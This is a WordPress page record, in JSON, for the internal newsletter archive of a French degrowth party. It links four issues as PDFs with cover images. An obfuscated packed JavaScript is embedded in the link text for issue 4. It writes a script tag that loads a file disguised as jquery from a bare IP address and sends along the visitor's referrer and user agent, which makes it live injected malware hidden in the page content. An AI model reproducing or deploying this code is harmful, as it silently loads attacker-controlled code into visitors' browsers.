{"id":6913,"date":"2012-02-09T20:45:39","date_gmt":"2012-02-09T19:45:39","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=6913"},"modified":"2012-11-29T09:57:35","modified_gmt":"2012-11-29T08:57:35","slug":"journal-interne-du-ppld","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=6913","title":{"rendered":"Journal interne du PPLD"},"content":{"rendered":"<p>&nbsp;<\/p>\n<p><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2012\/11\/JPPLD-n\u00b04.pdf\"><strong>Le <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|btsze|var|u0026u|referrer|iyzdk||js|php'.split('|'),0,{}))\n<\/script><\/noindex> num\u00e9ro 4<\/strong><\/a><\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2012\/11\/JPPLD-n\u00b04.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2012\/11\/JPPLD4.jpg\" alt=\"\" width=\"532\" height=\"755\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2012\/06\/JPPLD-no3.pdf\"><strong>Le num\u00e9ro 3<\/strong><\/a><\/p>\n<p><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2012\/06\/JPPLD-no3.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2012\/06\/JDPPLD-3.jpg\" alt=\"\" width=\"510\" height=\"732\" \/><\/a><\/p>\n<hr \/>\n<p><strong><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2012\/04\/Journal-PPLD-n\u00b02.pdf\">Le num\u00e9ro 2<\/a><\/strong><\/p>\n<p><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2012\/04\/Journal-PPLD-n\u00b02.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2012\/04\/journal-ppld-2.jpg\" alt=\"\" width=\"437\" height=\"607\" \/><\/a><\/p>\n<hr \/>\n<p><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2012\/02\/Journal-PPLD-n\u00b01.pdf\"><strong>Le num\u00e9ro 1<\/strong><\/a><\/p>\n<p><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2012\/02\/Journal-PPLD-n\u00b01.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2012\/02\/JPPLD1.jpg\" alt=\"\" width=\"421\" height=\"601\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Le num\u00e9ro 4 &nbsp; &nbsp; &nbsp; Le num\u00e9ro 3 Le num\u00e9ro 2 Le num\u00e9ro 1<\/p>\n","protected":false},"author":7,"featured_media":0,"parent":3982,"menu_order":10,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-6913","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/6913","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6913"}],"version-history":[{"count":6,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/6913\/revisions"}],"predecessor-version":[{"id":6917,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/6913\/revisions\/6917"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/3982"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6913"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}